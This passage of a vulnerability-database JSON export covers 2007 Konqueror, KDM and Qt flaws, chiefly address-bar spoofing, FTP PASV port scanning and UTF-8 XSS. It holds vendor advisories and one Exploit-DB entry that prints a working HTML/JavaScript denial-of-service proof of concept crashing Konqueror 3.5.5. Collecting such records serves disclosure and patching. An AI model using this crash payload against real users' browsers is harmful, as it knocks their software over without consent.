short amount of time instead of the\n\t current URL.\n\n", "edition": 4, "modified": "2007-09-14T00:00:00", "published": "2007-09-14T00:00:00", "id": "14AD2A28-66D2-11DC-B25F-02E0185F8D72", "href": "https://vuxml.freebsd.org/freebsd/14ad2a28-66d2-11dc-b25f-02e0185f8d72.html", "title": "konquerer -- address bar spoofing", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:26:20", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4224", "CVE-2007-4569", "CVE-2007-3820"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0905\n\n\nThe kdebase packages provide the core applications for KDE, the K Desktop\r\nEnvironment. These core packages include Konqueror, the web browser and\r\nfile manager.\r\n\r\nThese updated packages address the following vulnerabilities:\r\n\r\nKees Huijgen found a flaw in the way KDM handled logins when autologin and\r\n\"shutdown with password\" were enabled. A local user would have been able\r\nto login via KDM as any user without requiring a password. (CVE-2007-4569)\r\n\r\nTwo Konqueror address spoofing flaws were discovered. A malicious web site\r\ncould spoof the Konqueror address bar, tricking a victim into believing the\r\npage was from a different site. (CVE-2007-3820, CVE-2007-4224)\r\n\r\nUsers of KDE should upgrade to these updated packages, which contain\r\nbackported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026323.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026325.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026332.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026333.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026336.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-October/026337.html\n\n**Affected packages:**\nkdebase\nkdebase-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0905.html", "edition": 3, "modified": "2007-10-14T00:27:34", "published": "2007-10-08T18:50:43", "href": "http://lists.centos.org/pipermail/centos-announce/2007-October/026323.html", "id": "CESA-2007:0905", "title": "kdebase security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:L/AC:L/Au:S/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:04", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3820", "CVE-2007-4224", "CVE-2007-4225", "CVE-2007-4569"], "description": "New kdebase packages are available for Slackware 12.0 to fix security issues.\n\nA long URL padded with spaces could be used to display a false URL in\nKonqueror's addressbar, and KDM when used with no-password login could\nbe tricked into logging a different user in without a password. This\nis not the way KDM is configured in Slackware by default, somewhat\nmitigating the impact of this issue.\n\nMore details about the issues may be found here:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3820\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4225\n http://www.kde.org/info/security/advisory-20070919-1.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4225\n\n\nHere are the details from the Slackware 12.0 ChangeLog:\n\npatches/packages/kdebase-3.5.7-i486-3_slack12.0.tgz:\n Patched Konqueror to prevent \"spoofing\" the URL\n (i.e. displaying a URL other than the one associated with the page displayed)\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3820\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4225\n Patched KDM issue: \"KDM can be tricked into performing a password-less\n login even for accounts with a password set under certain circumstances,\n namely autologin to be configured and \"shutdown with password\" enabled.\"\n For more information, see:\n http://www.kde.org/info/security/advisory-20070919-1.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4569\n (* Security fix *)\npatches/packages/kdelibs-3.5.7-i486-3_slack12.0.tgz:\n Patched Konqueror's supporting libraries to prevent addressbar spoofing.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4225\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/kdebase-3.5.7-i486-3_slack12.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/kdelibs-3.5.7-i486-3_slack12.0.tgz\n\n\nMD5 signatures:\n\nSlackware 12.0 packages:\n467ac64778e2a72334b4ac13ff6f3e98 kdebase-3.5.7-i486-3_slack12.0.tgz\n13d4eeb321c922503e8edc49f40e95f4 kdelibs-3.5.7-i486-3_slack12.0.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg kdelibs-3.5.7-i486-3_slack12.0.tgz kdebase-3.5.7-i486-3_slack12.0.tgz", "modified": "2007-09-22T00:42:42", "published": "2007-09-22T00:42:42", "id": "SSA-2007-264-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.455499", "type": "slackware", "title": "[slackware-security] kdebase, kdelibs", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-25T16:36:17", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0242"], "description": "New qt packages are available for Slackware 10.2, 11.0, and -current to\nfix a security issue.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0242\n\n\nHere are the details from the Slackware 11.0 ChangeLog:\n\npatches/packages/qt-3.3.8-i486-1_slack11.0.tgz:\n Patched an issue where the Qt UTF 8 decoder may in some instances fail to\n reject overlong sequences, possibly allowing \"/../\" path injection or XSS\n errors.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0242\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/qt-3.3.4-i486-4_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/qt-3.3.8-i486-1_slack11.0.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/qt-3.3.8-i486-3.tgz\n\n\nMD5 signatures:\n\nSlackware 10.2 package:\n793d29a0b2ace2baf44a3f71ac9a7879 qt-3.3.4-i486-4_slack10.2.tgz\n\nSlackware 11.0 package:\n4c1a3f1c9095156a57f5292e4cb73673 qt-3.3.8-i486-1_slack11.0.tgz\n\nSlackware -current package:\ne8be820d81d7d3486ed9e210500a5e06 qt-3.3.8-i486-3.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg qt-3.3.8-i486-1_slack11.0.tgz", "modified": "2007-04-03T23:23:35", "published": "2007-04-03T23:23:35", "id": "SSA-2007-093-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.348591", "type": "slackware", "title": "[slackware-security] qt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "cvelist": ["CVE-2007-1564", "CVE-2007-1562", "CVE-2007-1563", "CVE-2007-1565", "CVE-2007-1308"], "description": "Passive FTP implementation in multiple client allows to use FTP bounce attack for port scanning.", "edition": 1, "modified": "2009-01-05T00:00:00", "published": "2009-01-05T00:00:00", "id": "SECURITYVULNS:VULN:7348", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7348", "title": "Multiple FTP clients FTP bounce attack", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "cvelist": ["CVE-2007-0242"], "description": "Oversized UTF-8 sequences are not blocking, making it possible to conduct cross-site scripting and directory traversal attacks.", "edition": 1, "modified": "2007-04-05T00:00:00", "published": "2007-04-05T00:00:00", "id": "SECURITYVULNS:VULN:7532", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7532", "title": "QT / KJS UTF-8 decoding security vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-4224"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://www.kde.org/info/security/advisory-20070816-1.txt\nSecurity Tracker: 1018579\n[Secunia Advisory ID:26612](https://secuniaresearch.flexerasoftware.com/advisories/26612/)\n[Secunia Advisory ID:26690](https://secuniaresearch.flexerasoftware.com/advisories/26690/)\n[Secunia Advisory ID:27096](https://secuniaresearch.flexerasoftware.com/advisories/27096/)\n[Secunia Advisory ID:27271](https://secuniaresearch.flexerasoftware.com/advisories/27271/)\n[Secunia Advisory ID:27108](https://secuniaresearch.flexerasoftware.com/advisories/27108/)\n[Secunia Advisory ID:27090](https://secuniaresearch.flexerasoftware.com/advisories/27090/)\n[Secunia Advisory ID:26351](https://secuniaresearch.flexerasoftware.com/advisories/26351/)\n[Secunia Advisory ID:26720](https://secuniaresearch.flexerasoftware.com/advisories/26720/)\n[Secunia Advisory ID:27106](https://secuniaresearch.flexerasoftware.com/advisories/27106/)\n[Related OSVDB ID: 37244](https://vulners.com/osvdb/OSVDB:37244)\nRedHat RHSA: RHSA-2007:0905\nRedHat RHSA: RHSA-2007:0909\nOther Advisory URL: https://issues.rpath.com/browse/RPL-1615\nOther Advisory URL: http://www.ubuntu.com/usn/usn-502-1\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-10/msg00006.html\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2007:176\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-October/msg00084.html\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-September/000234.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:176\nOther Advisory URL: http://securityreason.com/securityalert/2982\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-October/msg00085.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0081.html\nISS X-Force ID: 35828\nFrSIRT Advisory: ADV-2007-2807\n[CVE-2007-4224](https://vulners.com/cve/CVE-2007-4224)\nBugtraq ID: 25219\n", "edition": 1, "modified": "2007-08-06T17:08:02", "published": "2007-08-06T17:08:02", "href": "https://vulners.com/osvdb/OSVDB:37245", "id": "OSVDB:37245", "title": "KDE Konqueror setInterval() window.location Property Address Bar Spoofing", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-3820"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018396\n[Secunia Advisory ID:26612](https://secuniaresearch.flexerasoftware.com/advisories/26612/)\n[Secunia Advisory ID:26091](https://secuniaresearch.flexerasoftware.com/advisories/26091/)\n[Secunia Advisory ID:27096](https://secuniaresearch.flexerasoftware.com/advisories/27096/)\n[Secunia Advisory ID:27108](https://secuniaresearch.flexerasoftware.com/advisories/27108/)\n[Secunia Advisory ID:27090](https://secuniaresearch.flexerasoftware.com/advisories/27090/)\n[Secunia Advisory ID:26720](https://secuniaresearch.flexerasoftware.com/advisories/26720/)\n[Secunia Advisory ID:27106](https://secuniaresearch.flexerasoftware.com/advisories/27106/)\nRedHat RHSA: RHSA-2007:0905\nRedHat RHSA: RHSA-2007:0909\nOther Advisory URL: http://www.ubuntu.com/usn/usn-502-1\nOther Advisory URL: http://alt.swiecki.net/oper1.html\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-October/msg00084.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:176\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-October/msg00085.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-07/0145.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-07/0149.html\nISS X-Force ID: 35430\nFrSIRT Advisory: ADV-2007-2538\n[CVE-2007-3820](https://vulners.com/cve/CVE-2007-3820)\nBugtraq ID: 24918\nBugtraq ID: 24912\n", "edition": 1, "modified": "2007-07-13T17:22:37", "published": "2007-07-13T17:22:37", "href": "https://vulners.com/osvdb/OSVDB:37242", "id": "OSVDB:37242", "title": "KDE Konqueror konqueror/konq_combo.cc data: URI Scheme Address Bar Spoofing", "type": "osvdb", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0537"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1017591\n[Secunia Advisory ID:24013](https://secuniaresearch.flexerasoftware.com/advisories/24013/)\n[Secunia Advisory ID:24065](https://secuniaresearch.flexerasoftware.com/advisories/24065/)\n[Secunia Advisory ID:24442](https://secuniaresearch.flexerasoftware.com/advisories/24442/)\n[Secunia Advisory ID:24463](https://secuniaresearch.flexerasoftware.com/advisories/24463/)\n[Secunia Advisory ID:24889](https://secuniaresearch.flexerasoftware.com/advisories/24889/)\n[Secunia Advisory ID:27108](https://secuniaresearch.flexerasoftware.com/advisories/27108/)\n[Secunia Advisory ID:23932](https://secuniaresearch.flexerasoftware.com/advisories/23932/)\nRedHat RHSA: RHSA-2007:0909\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-10.xml\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Apr/0002.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-420-1\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-March/000161.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:031\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0540.html\nFrSIRT Advisory: ADV-2007-0505\n[CVE-2007-0537](https://vulners.com/cve/CVE-2007-0537)\nBugtraq ID: 22428\n", "edition": 1, "modified": "2007-01-23T07:48:55", "published": "2007-01-23T07:48:55", "href": "https://vulners.com/osvdb/OSVDB:32975", "id": "OSVDB:32975", "title": "KDE Konqueror KDE HTML library (kdelibs) HTML Parsing XSS", "type": "osvdb", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "cvelist": ["CVE-2007-1564"], "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.kde.org/info/security/advisory-20070326-1.txt)\nSecurity Tracker: 1017801\n[Secunia Advisory ID:24889](https://secuniaresearch.flexerasoftware.com/advisories/24889/)\n[Secunia Advisory ID:27108](https://secuniaresearch.flexerasoftware.com/advisories/27108/)\nRedHat RHSA: RHSA-2007:0909\nOther Advisory URL: http://www.ubuntu.com/usn/usn-447-1\nOther Advisory URL: https://issues.rpath.com/browse/RPL-1201\nOther Advisory URL: http://bindshell.net/papers/ftppasv/ftp-client-pasv-manipulation.pdf\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2007:072\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2007_6_sr.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0352.html\nFrSIRT Advisory: ADV-2007-1076\n[CVE-2007-1564](https://vulners.com/cve/CVE-2007-1564)\nBugtraq ID: 23091\n", "edition": 1, "modified": "2007-03-26T14:23:16", "published": "2007-03-26T14:23:16", "href": "https://vulners.com/osvdb/OSVDB:35199", "id": "OSVDB:35199", "title": "KDE Konqueror FTP Protocol PASV Response Client Manipulation", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0242"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24726](https://secuniaresearch.flexerasoftware.com/advisories/24726/)\n[Secunia Advisory ID:24797](https://secuniaresearch.flexerasoftware.com/advisories/24797/)\n[Secunia Advisory ID:26857](https://secuniaresearch.flexerasoftware.com/advisories/26857/)\n[Secunia Advisory ID:27275](https://secuniaresearch.flexerasoftware.com/advisories/27275/)\n[Secunia Advisory ID:24699](https://secuniaresearch.flexerasoftware.com/advisories/24699/)\n[Secunia Advisory ID:25263](https://secuniaresearch.flexerasoftware.com/advisories/25263/)\n[Secunia Advisory ID:24727](https://secuniaresearch.flexerasoftware.com/advisories/24727/)\n[Secunia Advisory ID:24889](https://secuniaresearch.flexerasoftware.com/advisories/24889/)\n[Secunia Advisory ID:26782](https://secuniaresearch.flexerasoftware.com/advisories/26782/)\n[Secunia Advisory ID:26804](https://secuniaresearch.flexerasoftware.com/advisories/26804/)\n[Secunia Advisory ID:27108](https://secuniaresearch.flexerasoftware.com/advisories/27108/)\n[Secunia Advisory ID:24705](https://secuniaresearch.flexerasoftware.com/advisories/24705/)\n[Secunia Advisory ID:24759](https://secuniaresearch.flexerasoftware.com/advisories/24759/)\n[Secunia Advisory ID:24847](https://secuniaresearch.flexerasoftware.com/advisories/24847/)\nRedHat RHSA: RHSA-2007:0883\nRedHat RHSA: RHSA-2007:0909\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:076\nOther Advisory URL: http://www.ubuntu.com/usn/usn-452-1\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Apr/0002.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070901-01-P.asc\nOther Advisory URL: http://www.trolltech.com/company/newsroom/announcements/press.2007-03-30.9172215350\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.348591\nOther Advisory URL: http://support.novell.com/techcenter/psdb/39ea4b325a7da742cb8b6995fa585b14.html\nOther Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00048.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:074\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00310.html\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-424.htm\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-April/000170.html\nISS X-Force ID: 33397\nFrSIRT Advisory: ADV-2007-1212\n[CVE-2007-0242](https://vulners.com/cve/CVE-2007-0242)\nBugtraq ID: 23269\n", "edition": 1, "modified": "2007-03-30T19:03:58", "published": "2007-03-30T19:03:58", "href": "https://vulners.com/osvdb/OSVDB:34679", "id": "OSVDB:34679", "title": "Qt codecs/qutfcodec.cpp UTF-8 Decoder Long Sequence XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T11:06:01", "description": "KDE Konqueror 3.x/IOSlave FTP PASV Port-Scanning Vulnerability. CVE-2007-1564. Remote exploit for linux platform", "published": "2007-03-21T00:00:00", "type": "exploitdb", "title": "KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1564"], "modified": "2007-03-21T00:00:00", "id": "EDB-ID:29770", "href": "https://www.exploit-db.com/exploits/29770/", "sourceData": "source: http://www.securityfocus.com/bid/23091/info\r\n\r\nKDE Konqueror is prone to a vulnerability that may allow attackers to obtain potentially sensitive information.\r\n\r\nA successful exploit of this issue would cause the affected application to connect to arbitrary TCP ports and potentially reveal sensitive information about services that are running on the affected computer. Information obtained may aid attackers in further attacks. \r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29770.zip", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29770/"}, {"lastseen": "2016-02-03T10:58:07", "description": "KDE Konqueror 3.5 JavaScript IFrame Denial of Service Vulnerability. CVE-2007-1308. Dos exploit for linux platform", "published": "2007-03-05T00:00:00", "type": "exploitdb", "title": "KDE Konqueror 3.5 JavaScript IFrame Denial of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1308"], "modified": "2007-03-05T00:00:00", "id": "EDB-ID:29713", "href": "https://www.exploit-db.com/exploits/29713/", "sourceData": "source: http://www.securityfocus.com/bid/22814/info\r\n\r\nKDE Konqueror is prone to a remote denial-of-service vulnerability because of an error in KDE's JavaScript implementation.\r\n\r\nAn attacker may exploit this vulnerability to cause Konquerer to crash, resulting in denial-of-service conditions.\r\n\r\nKonqueror included with KDE version 3.5.5 is vulnerable; other versions may also be affected. \r\n\r\n<html>\r\n<body>\r\n\r\nDemo of how to make Konqueror 3.5.5 crash by mark@bindshell.net.<p>\r\nSimply load this file in Konqueror. Vulnerable versions should segfault instantly with a null pointer exception.<p>\r\n<p>\r\n\r\n<script>\r\nread_iframe = function(iframe_name) {\r\n\tvar banner = document.getElementById(iframe_name).contentWindow.document.body.innerHTML;\r\n\talert(banner);\r\n}\r\n\r\nvar iframe = document.createElement(\"IFRAME\");\r\niframe.setAttribute(\"src\", 'ftp://localhost/anything');\r\niframe.setAttribute(\"name\", 'myiframe');\r\niframe.setAttribute(\"id\", 'myiframe');\r\niframe.setAttribute(\"onload\", 'read_iframe(\"myiframe\")');\r\niframe.style.width = \"100px\";\r\niframe.style.height = \"100px\";\r\n\t\r\ndocument.body.appendChild(iframe);\r\n\r\n</script>\r\n</body>\r\n</html>\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29713/"}], "debian": [{"lastseen": "2020-11-11T13:19:06", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0242"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1292-1 security@debian.org\nhttp://www.debian.org/security/ Noah Meyerhans\nMay 15, 2007\n- ------------------------------------------------------------------------\n\nPackage : qt4-x11\nVulnerability : missing input validation\nProblem type : local (remote)\nDebian-specific: no\nCVE Id(s) : CVE-2007-0242\nBugTraq ID : 23269\nDebian Bug : 417391\n\nAndreas Nolden discovered a bug in the UTF8 decoding routines in\nqt4-x11, a C++ GUI library framework, that could allow remote\nattackers to conduct cross-site scripting (XSS) and directory\ntraversal attacks via long sequences that decode to dangerous\nmetacharacters.\n\nFor the stable distribution (etch), this problem has been fixed in version\n4.2.1-2etch1\n\nFor the testing and unstable distribution (lenny and sid, respectively),\nthis problem has been fixed in version 4.2.2-2\n\nWe recommend that you upgrade your qt4-x11 package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-x11_4.2.1-2etch1.dsc\n Size/MD5 checksum: 1390 4c2ac9fc65dc3d31b90473d7ec038f1f\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-x11_4.2.1.orig.tar.gz\n Size/MD5 checksum: 37069122 2ab1c88084f55b94809f025a8503bf18\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-x11_4.2.1-2etch1.diff.gz\n Size/MD5 checksum: 22806 26c69455f8d09fffdfb9413a18f69174\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-doc_4.2.1-2etch1_all.deb\n Size/MD5 checksum: 21219244 450031c80fd48650103cb7dfb72ea4d3\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.2.1-2etch1_alpha.deb\n Size/MD5 checksum: 1275656 9881f80acbf96bd8279b1ea27bd01486\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.2.1-2etch1_alpha.deb\n Size/MD5 checksum: 1382940 c69e58cc57b87c77332d21f9b8325f94\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.2.1-2etch1_alpha.deb\n Size/MD5 checksum: 804814 bdda30be03d1c5cda09caf4c3b7e8803\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.2.1-2etch1_alpha.deb\n Size/MD5 checksum: 354964 14a3d2e028391002861dc94d448880b4\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.2.1-2etch1_alpha.deb\n Size/MD5 checksum: 99652 99eddea5a7be2cfccff4689955ebe7b4\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-debug_4.2.1-2etch1_alpha.deb\n Size/MD5 checksum: 57674544 824c85f2ab97e6f480d60730e7244e13\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.2.1-2etch1_alpha.deb\n Size/MD5 checksum: 4784924 76f7f0e56ad72818a905ce5f6eaf55f0\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.2.1-2etch1_alpha.deb\n Size/MD5 checksum: 1105144 274482c1b490076e2f05c758ec4dc495\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.2.1-2etch1_alpha.deb\n Size/MD5 checksum: 4983572 1805e33b31231fea005abf49c40f3f59\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.2.1-2etch1_amd64.deb\n Size/MD5 checksum: 1060908 d1132452139c18dd3d2ac96608a4c8f0\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.2.1-2etch1_amd64.deb\n Size/MD5 checksum: 4450316 a4c5af2560005fe85390c54f26118364\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.2.1-2etch1_amd64.deb\n Size/MD5 checksum: 1218820 98d8ef5491e28a96d4ce1e1392341819\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.2.1-2etch1_amd64.deb\n Size/MD5 checksum: 4289826 072954140ccc4baa4869479f52a22d54\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.2.1-2etch1_amd64.deb\n Size/MD5 checksum: 314114 3c4fbf8805f823cce3a19663749ce28f\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-debug_4.2.1-2etch1_amd64.deb\n Size/MD5 checksum: 57719944 6623d3a7b981512c9ade3377d56f1293\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.2.1-2etch1_amd64.deb\n Size/MD5 checksum: 1149424 77f92b9998c9e72cd55be91743a98b74\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-dev-tools_4.2.1-2etch1_amd64.deb\n Size/MD5 checksum: 745864 777718c827eb9469d1b0d00e3c022f99\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.2.1-2etch1_amd64.deb\n Size/MD5 checksum: 93040 617ba9729040e8e807de83a42c5faff5\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-designer_4.2.1-2etch1_arm.deb\n Size/MD5 checksum: 1055018 c366aa156f8e69a474c48564bc62c961\n http://security.debian.org/pool/updates/main/q/qt4-x11/qt4-qtconfig_4.2.1-2etch1_arm.deb\n Size/MD5 checksum: 93776 7a9f2fe985d327054315b9395d9a2302\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-qt3support_4.2.1-2etch1_arm.deb\n Size/MD5 checksum: 1298716 e310e6d3f68b3d253a127c9568659bce\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-dev_4.2.1-2etch1_arm.deb\n Size/MD5 checksum: 4541218 ffd64eb36975ea6966fa97ccc475e876\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-debug_4.2.1-2etch1_arm.deb\n Size/MD5 checksum: 56246534 31a36213f160a55ace99aae498e7365d\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-core_4.2.1-2etch1_arm.deb\n Size/MD5 checksum: 1210244 bb4fac86e13a3517f2e44c86a9c27740\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-gui_4.2.1-2etch1_arm.deb\n Size/MD5 checksum: 4794816 6ed6b5646d239e646b5801c18b74acd2\n http://security.debian.org/pool/updates/main/q/qt4-x11/libqt4-sql_4.2.1-2etch1_arm.deb\n 